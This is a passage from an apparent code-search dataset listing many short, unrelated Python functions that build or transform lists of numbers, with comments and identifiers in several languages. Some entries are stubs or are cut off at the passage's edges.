\n cpt = 0\n for e in mot:\n cpt += 1\n if cpt == n:\n lst.append(mot)\n return lst", "def numerize():\n pass", "def __numero_terme_sup(synthese, lg):\n tb_synthese = []\n for i in synthese:\n synth = []\n nu = 1\n pteur = 1\n for j in range(lg):\n if i & pteur:\n synth.append(nu)\n nu += 1\n pteur <<= 1\n tb_synthese.append(synth)\n return tb_synthese", "def subtraction_of(number_list):", "def compose_listofr(atom_name, listofn):\n c = 1.06\n c2 = 1.4\n listofr = []\n for x in range(len(listofn)):\n if (atom_name[0] == \"N\"):\n if (listofn[x].atom_name[0] == \"H\"):\n listofr.append(1.010*c)\n if (listofn[x].atom_name[0] == \"O\"):\n listofr.append(1.060*c)\n if (listofn[x].atom_name[0] == \"C\"):\n listofr.append(1.475*c)\n if (listofn[x].atom_name[0] == \"N\"):\n listofr.append(1.450*c)\n if (atom_name[0] == \"O\"):\n if (listofn[x].atom_name[0] == \"H\"):\n listofr.append(0.970*c)\n if (listofn[x].atom_name[0] == \"O\"):\n listofr.append(1.490*c)\n if (listofn[x].atom_name[0] == \"C\"):\n listofr.append(1.160*c)\n if (listofn[x].atom_name[0] == \"N\"):\n listofr.append(1.060*c)\n if (atom_name[0] == \"C\"):\n if (listofn[x].atom_name[0] == \"H\"):\n listofr.append(1.090*c)\n if (listofn[x].atom_name[0] == \"O\"):\n listofr.append(1.160*c)\n if (listofn[x].atom_name[0] == \"C\"):\n listofr.append(1.540*c)\n if (listofn[x].atom_name[0] == \"N\"):\n listofr.append(1.475*c)\n if (atom_name[0] == \"H\"):\n if (listofn[x].atom_name[0] == \"H\"):\n listofr.append(0.740*c2)\n if (listofn[x].atom_name[0] == \"O\"):\n listofr.append(0.970*c2)\n if (listofn[x].atom_name[0] == \"C\"):\n listofr.append(1.090*c2)\n if (listofn[x].atom_name[0] == \"N\"):\n listofr.append(1.010*c2)\n return listofr", "def maiores(lista, n):\n numeros = [lista for lista in lista if lista > n]\n return numeros", "def retornaDigitos(numero):\r\n\tlista = []\r\n\twhile numero>=10:\r\n\t\tx = numero%10;\r\n\t\tnumero = numero/10;\r\n\t\tlista.append(x)\r\n\tlista.append(numero)\r\n\tlista.reverse()\r\n\treturn lista", "def double_nums(num_list):", "def arredondar(self):\n for y in range(self.altura):\n for x in range(self.largura):\n for i in range(3):\n self.lista[x][y][i] = int(self.lista[x][y][i])", "def list_to_nine(n):\n if n < 10:\n print(n)\n else: \n print(n, end=\", \")\n n = abs(n - mirror(n))\n list_to_nine(n)", "def divisior(n: int) -> list:\n j = [n]\n for d in range(n+1): #loop bis n\n d > 0", "def raizCuadrada(listaNumeros):\n\n\treturn [math.sqrt(n) for 
n in listaNumeros]", "def carac_reproducciones(caracteristica, valor_min, valor_max, catalog):\n artistasNoRepetidos = lt.newList('ARRAY_LIST')\n artistasRepetidos = lt.newList('ARRAY_LIST')\n MapCaracteristicas = mp.get(catalog['caraContenido'], caracteristica)\n RBTcaracteristica = me.getValue(MapCaracteristicas)\n lista_listas_musica = om.values(RBTcaracteristica, valor_min, valor_max)\n lista_lista_musica = it.newIterator(lista_listas_musica)\n while it.hasNext(lista_lista_musica): \n lista_musica = it.next(lista_lista_musica)#lista_musica es un dicc de listas que tengo que recorrer \n musicas = it.newIterator(lista_musica)\n while it.hasNext(musicas):\n musica = it.next(musicas) #iterar sobre esta lista por artist_id\n if int(lt.isPresent(artistasNoRepetidos, (musica['artist_id']))) == 0:\n lt.addLast(artistasNoRepetidos, musica['artist_id'])\n if int(lt.isPresent(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))) == 0:\n lt.addLast(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))\n else:\n if int(lt.isPresent(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))) == 0:\n lt.addLast(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))\n return lt.size(artistasRepetidos), lt.size(artistasNoRepetidos)", "def _split_into_legal_volume(\n self, oclc_numbers: List[str] = [], n: int = 50\n ) -> List[str]:\n\n for i in range(0, len(oclc_numbers), n):\n yield \",\".join(oclc_numbers[i : i + n])", "def raizCuadrada(listNum):\n\n return [math.sqrt(n) for n in listNum]", "def loto() -> List[int]:\n numeros = []\n nbre_valeurs = 6\n val_min = 1\n val_max = 49\n\n nbre_elements = 0\n while nbre_elements <= nbre_valeurs:\n numero = random.randint(val_min, val_max)\n if numero not in numeros:\n numeros.append(numero)\n nbre_elements += 1\n\n return numeros", "def get_list(self):\r\n return self.numbers", "def pretraga_po_nazivu(self, lst,rijec):\n pretrazeno = []\n for i in lst:\n if i.naziv.lower().find(rijec.lower()) != -1:\n pretrazeno.append(i)\n return pretrazeno", "def fn(n):\n if not n: return []\n elif n < 20: return [mp[n]]\n elif n < 100: return [mp[n//10*10]] + fn(n%10)\n else: return [mp[n//100], \"Hundred\"] + fn(n%100)", "def inutiliza_por_lote(self, notas, serie, justificativa): #ok\r\n # notas eh uma lista\r\n notas = notas # notas\r\n serie = str(serie) # serie\r\n if not justificativa:\r\n justificativa = \"Numeracao nao utilizada!\" \r\n\r\n for i in notas:\r\n nnf = str(i)\r\n #serie = \"0\"\r\n self.inutiliza_por_nota(nnf, serie, justificativa)", "def diviseLignes(prog):\n\t\n\tliste = []\n\tligne = \"\"\n\ti=0\n\twhile i < len(prog):\n\t\tif prog[i] == '\\n': #Si on rencontre un saut de ligne.\n\t\t\t#if ligne != \"\": # Et si cette ligne precedant le saut de lignes n'etait pas vide, on l'ajoute.\n\t\t\tliste += [ligne]\n\t\t\tligne = \"\"\n\t\telse: #Si on atteit pas un saut de ligne, on continue a lire\n\t\t\tligne += prog[i]\n\t\ti+=1\n\tif ligne != \"\":\n\t\tliste += [ligne]\n\treturn liste", "def pgm_vers_matrice_simple(fichier):\n\n # Fichier à lire\n fic_in = open(fichier,\"r\")\n\n i = 0 # Numéro de ligne du fichier\n matrice = []\n for ligne in fic_in:\n if i >= 3:\n liste_str = ligne.split()\n liste = [int(x) for x in liste_str]\n matrice += [liste]\n i = i + 1\n\n # Fermeture des fichiers\n fic_in.close()\n return matrice", "def liste_N_nb_premier(N):\n liste = []\n i = 0\n while len(liste) < N:\n if is_prime(i):\n liste.append(i)\n i += 
1\n return liste", "def find_all_lists(rij):\n\n langste_rij = [0]*len(rij)\n langste_rij[0] = 1\n\n for i in range(len(rij)):\n for j in range(i):\n #print \"*******\", i, rij[i], j, langste_rij[i]\n if ((rij[j] < rij[i]) and (langste_rij[i] < langste_rij[j]+1)):\n langste_rij[i] = langste_rij[j] + 1\n\n return langste_rij", "def lessthan_5(num_list):", "def abscissae(self) -> List[float]:", "def calcular_traspuesta(self):\n # supongo que el nodo de mayor indice en je es el maximo nodo que hay\n n1 = np.max(self.je) + 1 # el +1 es por la base-0 de python\n # ahora para cada elem1, recorro los elem0 para ver las conexiones\n # notar que supondre que los elems0 son range(self.num) y los elems1 son range(n1)\n jeT = []\n len_jeT = 0\n neT = np.zeros(n1, dtype=int)\n for i1 in range(n1): # aca supongo que los elems1 son range(n1), o sea una lista de indices\n for i0 in range(self.num): # idem para elems0, son una lista de indices\n elem0 = self.get_con_elem0(i0)\n if i1 in elem0:\n jeT.append(i0)\n len_jeT += 1\n neT[i1] += 1\n # convierto el jeT a numpy\n jeT = np.array(jeT, dtype=int)\n # ensamblo el ieT\n ieT = np.zeros(n1+1, dtype=int)\n ieT[n1] = len_jeT # empiezo con el indice de un elemento extra que no existe\n for i1 in range(n1-1, -1, -1):\n ieT[i1] = ieT[i1+1] - neT[i1] # de ahi calculo el indice donde empieza cada elemento\n return n1, len_jeT, neT, ieT, jeT", "def dataPrep(mydata: list) -> list:\n mylist = [int(elm) for elm in mydata]\n\n volt = int(max(mylist)) + 3\n start = 0\n\n mylist.extend([volt, start])\n mylist.sort()\n\n return mylist", "def figurate_list(s):\n f = polygon_gen(s)\n ans = []\n c = next(f)\n while c < 999: c = next(f)\n while c < 10000:\n c = str(c)\n if c[2] != '0': ans.append(FigurateNode(c[:2], c[-2:], s))\n c = next(f)\n return ans", "def listarNum(num):\r\n num=str(num)\r\n list_num=np.array([])\r\n for n in num:\r\n n=float(n)\r\n list_num=np.append(list_num, n)\r\n return list_num", "def get_puzzel(size, puz) :\n if (len(puz)!= size) :\n print(\"Error : Size given and the size of the puzzle doesn't concorde\\nThe puzzle is not well formatted.. ciao\")\n exit()\n else :\n lst_ret = []\n for i in puz:\n line = list(filter(None, re.split(r'\\n| ', i)))\n if (len (line) == size) :\n for j in line :\n temp_val = check_int(j)\n if (temp_val < size ** 2):\n if (temp_val not in lst_ret) :\n lst_ret.append(temp_val)\n else :\n print(\"Error : Duplicate element in the puzzle [{}]\".format(temp_val))\n exit()\n else :\n print(\"Error : Element in the puzzle is too large [{}] size^2 [{}]\".format(temp_val, size**2))\n exit()\n else :\n print(\"Error: Puzzle not well formatted [{}] should be {} elements, ciao \".format(line, size))\n exit()\n return (lst_ret)", "def numListar(lista):\r\n num_list=str()\r\n for num in lista:\r\n num = int(num)\r\n num_list=num_list+str(num)\r\n return num_list", "def lis(n1,n2):\n\ti = 0\n\tif n1 and n2 <= 20:\n\t\tfor x in range(n1,n2+1):\n\t\t\tlis1.append(x*x)\n\t\tlis1.reverse()\n\t\t\n\t\tfor y in lis1:\n\t\t\tif i <=4:\n\t\t\t\tlis1.pop()\n\t\t\t\ti +=1\n\t\tprint(lis1)\n\telse:\n\t\tprint(\"Value out of range\")", "def number_list(l):\n return ['{i:>{s}}. 
{v}'.format(s=len(str(len(l))), i=i+1, v=l[i]) for i in range(len(l))]", "def evaluate_files_list(numbers):\n expanded = []\n for number in numbers.split(\",\"):\n if \"-\" in number:\n start, end = number.split(\"-\")\n nrs = range(int(start), int(end) + 1)\n expanded.extend(nrs)\n else:\n expanded.append(int(number))\n return expanded", "def mostrEmpl2(finalData): #Esta sección fue hecha por Ángel\n listaUE = []\n for elemento in finalData:\n nombre = elemento[0]\n listaUE.append(nombre) \n return listaUE", "def ex_xerox(data):\n n = 1\n try:\n n = int(data[0])\n except ValueError:\n pass\n data = data[1:]\n rv = []\n for _ in range(n):\n rv += data\n return rv", "def __init__(self):\n self.numeralList = self.nf.getOcrNumerals(1234567890, 10)", "def _pega_no(self, index):\n ponteiro = self.inicio\n for i in range(index):\n if ponteiro:\n ponteiro = ponteiro.prox\n else:\n raise IndexError(\"list index out of range\")\n return ponteiro", "def gatherDivisors(number): # prvni string ve funkci je comment; \"\"\" znamenam ze je na vic radek\n\tdivisors = []\n\tfor div in range(1, number + 1): # range vyhodi vse od jedne az do number\n\t\tif number % div == 0:\n\t\t\tdivisors.append(div)\n\treturn divisors", "def fn(n):\n if n == 0: return [\"\"]\n if n == 1: return [\"0\", \"1\", \"8\"]\n return [x+y+xx for x, xx in mp for y in fn(n-2)]", "def reemplaza_tildes(palabra):", "def truncatable_primes():\n list_tp = []\n i = 8\n while len(list_tp) < 11:\n if is_truncatable(i):\n list_tp.append(i)\n i += 1\n if i % 100 == 0:\n print(\"i : \", i)\n return list_tp, sum(list_tp)", "def get_list_of_int2(self):\n pass", "def powiekszoneParzysteZZerami(L): #[!] drobny błąd\n wynik = []\n for n in L:\n if parzysta(n)==True:\n wynik.append(n+1) # Jesli wolisz: wynik += [n+1]\n else:\n wynik.append(n)\n wynik.append(0) # Znowu, mozna: wynik += [0]\n return wynik", "def genera_vacios(lista_anidada):\n lista_vacios = [ ]\n letras = [\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\"]\n\n for n, x in enumerate(lista_anidada):\n for i, y in enumerate(x):\n if y == \"0\":\n fila = letras[n]\n lugar = str(i+1)\n estacionamiento = fila,lugar\n lista_vacios.append(\"\".join(estacionamiento))\n return lista_vacios", "def primos_permitidos():\r\n parejas_permitidas = [(31,23),(47,19),(7,19),(17,41),(31,7),(29,47),(37,23),(2,79),(43,17),(7,37),(5,61),\r\n (17,31),(23,19),(23,7),(11,83),(17,7),(71,3),(37,29),(7,79),(11,59),(37,3),(3,59),(13,53),(79,11),(89,3),\r\n (2,97),(23,5),(13,41),(89,2),(5,97),(89,7),(41,7),(59,7),(19,41),(31,13),(29,19),(79,5),(83,7),\r\n (83,3),(43,7),(23,17),(23,29),(3,41),(17,47),(37,13),(37,11),(53,5),(43,3),(5,83),(7,67),(89,5),\r\n (19,53),(29,17),(53,11),(11,41),(5,47),(73,13),(13,23),(47,29),(5,89),(17,23),(5,43),(71,11),(67,5),\r\n (149,3),(7,47),(19,37),(127,7),(109,7),(7,53),(67,2),(19,41),(67,11),(7,97),(3,103),(3,131),(163,2),(11,61),\r\n (113,5),(73,5),(17,7),(61,5),(97,5),(43,13),(157,5),(2,107),(71,5),(3,151),(5,29),(2,151),(137,3),\r\n (13,29),(59,11),(137,5),(47,11),(13,47),(2,197),(53,17),(239,3),(229,2),(23,37),(53,13),(11,73)]\r\n return parejas_permitidas", "def obtener_preguntas_juego(num_preguntas=0, categ=\"none\", subcateg=\"none\", nivel=0):\r\n\r\n if not (is_categoria(categ)):\r\n categ = \"none\"\r\n\r\n preguntas_juego = [] # Lista preguntas juego\r\n\r\n if num_preguntas != 0:\r\n if categ == \"CM\":\r\n preguntas_archivo = arch.leer_archivo(\"Ciencias.txt\")\r\n renglones_preguntas = obtener_renglones(preguntas_archivo, subcateg, nivel)\r\n lista_aux = 
[]\r\n while num_preguntas != 0:\r\n num_random = num_rand(0, len(preguntas_archivo))\r\n if num_random in renglones_preguntas:\r\n lista_aux = []\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 3))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 4))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 5))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 6))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 7))\r\n preguntas_juego.append(lista_aux)\r\n renglones_preguntas.remove(num_random)\r\n num_preguntas -= 1\r\n elif categ == \"SC\":\r\n preguntas_archivo = arch.leer_archivo(\"Sociales.txt\")\r\n renglones_preguntas = obtener_renglones(preguntas_archivo, subcateg, nivel)\r\n lista_aux = []\r\n while num_preguntas != 0:\r\n num_random = num_rand(0, len(preguntas_archivo))\r\n if num_random in renglones_preguntas:\r\n lista_aux = []\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 3))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 4))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 5))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 6))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 7))\r\n preguntas_juego.append(lista_aux)\r\n renglones_preguntas.remove(num_random)\r\n num_preguntas -= 1\r\n elif categ == \"CT\":\r\n preguntas_archivo = arch.leer_archivo(\"Cultura.txt\")\r\n renglones_preguntas = obtener_renglones(preguntas_archivo, subcateg, nivel)\r\n lista_aux = []\r\n while num_preguntas != 0:\r\n num_random = num_rand(0, len(preguntas_archivo))\r\n if num_random in renglones_preguntas:\r\n lista_aux = []\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 3))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 4))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 5))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 6))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 7))\r\n preguntas_juego.append(lista_aux)\r\n renglones_preguntas.remove(num_random)\r\n num_preguntas -= 1\r\n elif categ == \"ET\":\r\n preguntas_archivo = arch.leer_archivo(\"Entretenimiento.txt\")\r\n renglones_preguntas = obtener_renglones(preguntas_archivo, subcateg, nivel)\r\n lista_aux = []\r\n while num_preguntas != 0:\r\n num_random = num_rand(0, len(preguntas_archivo))\r\n if num_random in renglones_preguntas:\r\n lista_aux = []\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 3))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 4))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 5))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 6))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 7))\r\n preguntas_juego.append(lista_aux)\r\n renglones_preguntas.remove(num_random)\r\n num_preguntas -= 1\r\n elif categ == \"none\":\r\n preguntas_archivo = arch.leer_archivo(\"Ciencias.txt\")\r\n preguntas_archivo.extend(arch.leer_archivo(\"Sociales.txt\"))\r\n preguntas_archivo.extend(arch.leer_archivo(\"Cultura.txt\"))\r\n preguntas_archivo.extend(arch.leer_archivo(\"Entretenimiento.txt\"))\r\n renglones_preguntas = obtener_renglones(preguntas_archivo, nivel=nivel)\r\n lista_aux = []\r\n while num_preguntas != 0:\r\n num_random = num_rand(0, len(preguntas_archivo))\r\n if num_random in renglones_preguntas:\r\n 
lista_aux = []\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 3))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 4))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 5))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 6))\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 7))\r\n preguntas_juego.append(lista_aux)\r\n renglones_preguntas.remove(num_random)\r\n num_preguntas -= 1\r\n \r\n return preguntas_juego", "def lis(n1,n2):\n\ti = 0\n\tif n1 and n2 <= 20:\n\t\tfor x in range(n1,n2+1):\n\t\t\tlis1.append(x*x)\n\t\tlis1.reverse()\n\t\t\n\t\tfor y in lis1:\n\t\t\tif i <=4:\n\t\t\t\tlis2.append(y)\n\t\t\t\ti +=1\n\t\tprint(lis2)\n\telse:\n\t\tprint(\"Value out of range\")", "def genereaza_indivizi(numar_indivizi: int):\n indivizi = list()\n for i in range(0, numar_indivizi):\n indivizi.append(genereaza_codificare())\n return indivizi", "def cal_list_p(self, aux):\r\n list_p = np.array([])\r\n \r\n self.cal_et()\r\n #Para cada vector configuración binaria que etiqueta al elemento del vector A obtenemos un numero decimal sobre el número de elemento, a partir de aqui podemos hacer el calculo de la propagacion\r\n for binn in self.et:\r\n binn_2 = np.append(binn,aux)\r\n dec_p = numListar(binn_2)\r\n dec_p = int(str(dec_p), 2)\r\n list_p = np.append(list_p, [dec_p])\r\n return list_p", "def generar_numeros_pares(n = 100):\n pares = []\n \n contador = 0\n numero = 0\n \n while contador < n:\n if numero % 2 == 0:\n pares.append(numero)\n contador += 1\n \n numero += 1\n \n return pares", "def pretraga_po_cijeni(self, lst, broj):\n pretrazeno = []\n for i in lst:\n if i.cijena == broj:\n pretrazeno.append(i)\n return pretrazeno", "def cal_et(self):\r\n\r\n for ind in range(2**(4*self.k)):\r\n i=0\r\n num = int(bin(ind)[2:])\r\n aux = listarNum(num)\r\n list_num=np.array([])\r\n while i < 4*self.k:\r\n if len(aux) < 4*self.k-i:\r\n list_num=np.append(list_num, [0.])\r\n elif len(aux)==4*self.k-i:\r\n list_num=np.append(list_num, aux)\r\n i=i+1\r\n \"\"\"\r\n reversed_list_num = list_num[::-1]\r\n self.et[ind]=reversed_list_num\r\n \"\"\"\r\n self.et[ind]=list_num", "def primitivas_np2list(primitivas):\n for primitiva in primitivas:\n for key, value in primitiva.items():\n if key[:3]==\"pos\" or key[:3]==\"mag\" or key[:3]==\"dif\":\n try:\n value_temp = value.tolist()\n except AttributeError:\n # pass\n continue\n else:\n primitiva[key] = value_temp \n\n return primitivas", "def cal_list_a(self):\r\n \r\n list_a = np.array([])\r\n \r\n self.cal_et()\r\n #Para cada vector configuración binaria que etiqueta al elemento del vector A obtenemos un numero decimal sobre el número de elemento, a partir de aqui podemos hacer el calculo de la propagacion\r\n list_a = np.array([])\r\n for binn in self.et:\r\n dec_a = numListar(binn)\r\n dec_a = int(str(dec_a), 2)\r\n list_a = np.append(list_a, [dec_a]) \r\n return list_a", "def snr_list(self):\n return [self.snr_one_iteration(q) for q in range(self.N_itr)]", "def scan(self) -> List[int]:", "def scan(self) -> List[int]:", "def nlegomena(self, n: int) -> list:\n nlegomena_ = [typ for typ, freq in self.items() if freq == n]\n return nlegomena_", "def secuencia(R, Q, q):\r\n n = 1\r\n r = []\r\n for qq in q:\r\n for qqq in qq.eps:\r\n r.append(qqq)\r\n r = sorted(r)\r\n\r\n for l in r:\r\n print('la l', l)\r\n Qaux = []\r\n for j in range(len(Q)):\r\n notaux = []\r\n notaux.append(Q[j][0]+j*l[0])\r\n notaux.append(Q[j][1]+(j+1)*l[0])\r\n 
notaux.append(Q[j][2])\r\n Qaux.append(notaux)\r\n # print(Qaux)\r\n Qaux[-1][1] = R[-1][1]\r\n dibuja(R, Qaux, n)\r\n n += 1", "def listToInt(node):\n digit = 0\n number = 0\n curr_node = node\n while curr_node:\n number += pow(10, digit) * curr_node.val\n curr_node = curr_node.next\n digit += 1\n \n return number", "def power_list():", "def exo3_1(mu,x0,n):\r\n S = []\r\n valeur = x0\r\n S.append(valeur)\r\n for i in range(0,n):\r\n valeur = exo2_1(valeur,mu)\r\n S.append(valeur)\r\n return S", "def pretraga_po_opisu(self, lst, rijec):\n pretrazeno = []\n for i in lst:\n if i.opis.lower().find(rijec.lower()) != -1:\n pretrazeno.append(i)\n return pretrazeno", "def dishlist_prices(n: list) -> list:\r\n return [dish.price for dish in n]", "def getStrs(pre,num):\n result = []\n for i in range(num):\n result.append(pre+str(i))\n return result", "def altnum(n):\n a = []\n for i in range(1, n + 1):\n if i%2 == 0:\n s = - i**2\n else:\n s = i**2\n a.append(s) \n return a", "def numbers(num):\n r = []\n for i in range(num):\n d = len(r)\n r = [1 if i == 0 or i == d else r[i-1]+r[i] for i in range(d+1)]\n yield r", "def icofrac(self):\n nbins = 6\n del_bin = 100.0/nbins\n fracs = []\n for atom in m.atoms:\n fracs.append((float(atom.vp.index[2])/float(sum(atom.vp.index))*100.0))\n bin = int( (float(atom.vp.index[2])/float(sum(atom.vp.index))*100.0) /(100.0/(nbins-1)))\n atom.z = bin+1\n fracs.sort()\n print('Min %: {0}. Max %: {1}'.format(min(fracs),max(fracs)))", "def promedio_disparos():\n with open(\"Basedatos.txt\", \"r\") as bd:\n datos = bd.readlines()\n disparos_totales = 0\n lista_disparos = []\n #se obtienen todos los puntajes\n for x in datos:\n lista = x[:-1].split(\",\")\n lista_disparos.append(lista)\n disparos_totales += int(lista[5]) #se van sumando cada uno de los puntajes\n disparos_totales /= len(lista_disparos) #se divide el puntaje entre el numero de usuarios\n disparos_totales = (round(disparos_totales, 2)) #se redondea el resultado a dos decimales\n print(\"Los disparos totales en promedio para ganar fueron: {}\".format(disparos_totales))", "def filtreNormales(liste):\r\n l=[]\r\n for i in range(len(liste)):\r\n if liste[i][0]!=0: l.append(i)\r\n return l", "def nr_pare(lista):\n nr_elemente_pare = 0\n for i in lista:\n if i % 2 == 0:\n nr_elemente_pare += 1\n return nr_elemente_pare", "def sortStingListByNumber(inlist, n):\n indices = []\n outlist = []\n nums = []\n number = re.compile(ur\"\\d+\")\n # print \"inlist: \", inlist\n for e in inlist:\n cur_nums = re.findall(number, e)\n cur_nums_list = []\n for s in cur_nums:\n cur_nums_list.append(int(s))\n num = int(re.findall(number, e)[n])\n if indices:\n if indices[0] > num:\n indices = [num] + indices\n outlist = [e] + outlist\n nums = [cur_nums_list] + nums\n elif indices[-1] < num:\n indices.append(num)\n outlist = outlist + [e]\n nums = nums + [cur_nums_list]\n for i in range(1, len(indices)):\n if indices[i-1] < num and indices[i] > num:\n indices = indices[:i] + [num] + indices[i:]\n outlist = outlist[:i] + [e] + outlist[i:]\n nums = nums[:i] + [cur_nums_list] + nums[i:]\n else:\n indices.append(num)\n outlist.append(e)\n nums.append(cur_nums_list)\n\n return outlist, nums", "def agregarprecios(obras):\n costos = lt.newList(datastructure='ARRAY_LIST')\n costototal = 0\n z = 1\n while z <= lt.size(obras):\n costofinal = 0\n pesofinal = 0\n costo_area = 0\n costo_volumen = 0\n if lt.getElement(obras,z)['Weight (kg)'] != '':\n costofinal = 72.00 * float(lt.getElement(obras,z)['Weight (kg)'])\n pesofinal += 
float(lt.getElement(obras,z)['Weight (kg)'])\n if lt.getElement(obras,z)['Diameter (cm)'] != '':\n costo_area = 72.00 * ((2 * 3.1416 * (float(lt.getElement(obras,z)['Diameter (cm)'])/2) * float(lt.getElement(obras,z)['Diameter (cm)']) + 2 * 3.1416 * ((float(lt.getElement(obras,z)['Diameter (cm)'])/2) ** 2))/10000)\n elif (lt.getElement(obras,z)['Height (cm)'] != '') and (lt.getElement(obras,z)['Depth (cm)'] != '') and (lt.getElement(obras,z)['Width (cm)'] != ''):\n costo_area = 72.00 * (((2 * float(lt.getElement(obras,z)['Height (cm)']) * (float(lt.getElement(obras,z)['Depth (cm)']) + float(lt.getElement(obras,z)['Width (cm)']))) + (2 * float(lt.getElement(obras,z)['Depth (cm)']) * float(lt.getElement(obras,z)['Width (cm)'])))/10000)\n elif (lt.getElement(obras,z)['Height (cm)'] != '') and (lt.getElement(obras,z)['Width (cm)'] != ''):\n costo_area = 72.00 * ((float(lt.getElement(obras,z)['Width (cm)']) * float(lt.getElement(obras,z)['Height (cm)']))/10000)\n if (lt.getElement(obras,z)['Diameter (cm)'] != '') and (lt.getElement(obras,z)['Height (cm)'] != ''):\n costo_volumen = 72.00 * (((3.1416 * (float(lt.getElement(obras,z)['Diameter (cm)'])/2) ** 2) * (float(lt.getElement(obras,z)['Height (cm)'])))/1000000)\n elif (lt.getElement(obras,z)['Height (cm)'] != '') and (lt.getElement(obras,z)['Depth (cm)'] != '') and (lt.getElement(obras,z)['Width (cm)'] != ''):\n costo_volumen = 72.00 * ((float(lt.getElement(obras,z)['Width (cm)']) * float(lt.getElement(obras,z)['Height (cm)']) * float(lt.getElement(obras,z)['Depth (cm)']))/1000000)\n if costo_area > costofinal:\n costofinal = costo_area\n if costo_volumen > costofinal:\n costofinal = costo_volumen\n if costofinal == 0:\n costofinal = 48.00\n lt.addLast(costos,lt.newList('ARRAY_LIST'))\n lt.addLast(lt.getElement(costos,z),lt.getElement(obras,z))\n lt.addLast(lt.getElement(costos,z),costofinal)\n costototal += costofinal\n z += 1\n return (costos,costototal,pesofinal)", "def __lista_krawedzi__(self):\n s = 0\n for cell in self.cells: # [ 1 0 12 11] = [kr1 kr2 kr3 kr4]\n s += len(cell) # zlicza ile w kolejnych komurkach pkt (krawedzi) (liczy ile jest w wierszu [1 2 12 11] czyli 4 krawedzie\n\n lista_kr = np.array([[0] * 4] * s, dtype=int)\n\n edgeNum = 0\n for i, cell in enumerate(self.cells):\n nNodes = len(cell)\n for l in range(nNodes):\n if l == nNodes-1:\n lista_kr[edgeNum] = [cell[l], cell[0], i, -1]\n else:\n lista_kr[edgeNum] = [cell[l], cell[l+1], i, -1]\n edgeNum += 1\n\n # [ 1 0 0 1] = [pkt1 pkt2 wl sasiad-jeszcze nie obecny]\n return lista_kr", "def scan(self) -> list[int]:", "def solution(self):\n return [(\"simple 1\", 1.),\n (\"simple 2\", 1.),\n (\"simple 3\", 1.),\n (\"simple 4\", 1.),\n (\"simple 5\", 1.),\n (\"simple 10\", 1.),\n (\"simple 15\", 1.),\n (\"thai 1\", 1.),\n (\"thai 2\", 1.),\n (\"thai 3\", 1.),\n (\"thai 4\", 1.),\n (\"thai 5\", 1.),\n (\"thai 10\", 1.),\n (\"thai 15\", 1.),\n ]", "def sequencia_nao_utilizada(self, serie, sequencia_utilizada):\r\n # python /u1/caixa/nfce.py -p listagem -n 1 300 -s 80 -ib 1\r\n\r\n sequencia_utilizada = sorted(sequencia_utilizada)\r\n inicial = sequencia_utilizada[0]\r\n final = sequencia_utilizada[-1] + 1\r\n\tdic = collections.Counter(sequencia_utilizada)\r\n\tnotas_nao_utilizadas = [i for i in range(inicial, final) if dic[i] == 0]\r\n \r\n nova_listagem = []\r\n for nota in notas_nao_utilizadas:\r\n dnot = {}\r\n dnot[\"docsitcodigo\"] = 999 \r\n dnot[\"descricao\"] = \"Sequencia nao utilizada\"\r\n\t dnot[\"docnumero\"] = nota\r\n dnot[\"docserie\"] = serie\r\n\t 
nova_listagem.append(dnot)\r\n return nova_listagem", "def _lists_of_n(self, myList, n):\n if len(myList) <= 0:\n return []\n \n if len(myList) <= n:\n return [ myList ]\n\n ret = []\n currentList = []\n count = 0\n for item in myList:\n count = count + 1\n currentList.append(item)\n if count % n == 0:\n ret.append(currentList)\n currentList = []\n if len(currentList) > 0:\n ret.append(currentList)\n return ret", "def intToList(num):\n root_node = ListNode(num % 10)\n curr_node = root_node\n num //= 10\n while num:\n next_node = ListNode(num % 10)\n curr_node.next = next_node\n curr_node = next_node\n num //= 10\n \n return root_node", "def numer(self, a):\n return a", "def __init__(self):\n self.numList=[]", "def fraclist(l, percent):\n return l[:int(round(len(l)*percent/100.0))]", "def numero_a_letras(n):\n especiales = {0: 'cero', 10: 'diez', 11: 'once', 12: 'doce', 13: 'trece', 14: 'catorce', 15: 'quince', 20: 'veinte', 100: 'cien', 1000: 'mil'}\n if n in especiales:\n return especiales[n]\n if n < 100:\n cifras = ['', 'una', 'dos', 'tres', 'cuatro', 'cinco', 'seis', 'siete', 'ocho', 'nueve']\n decenas = ['', 'dieci', 'veinti', 'treinta', 'cuarenta', 'cincuenta', 'sesenta', 'setenta', 'ochenta', 'noventa']\n if n % 10 == 0:\n return decenas[n // 10]\n if n < 30:\n return f\"{decenas[n // 10]}{cifras[n % 10]}\"\n return f\"{decenas[n // 10]} y {cifras[n % 10]}\"\n elif n < 1000:\n centenas = ['', 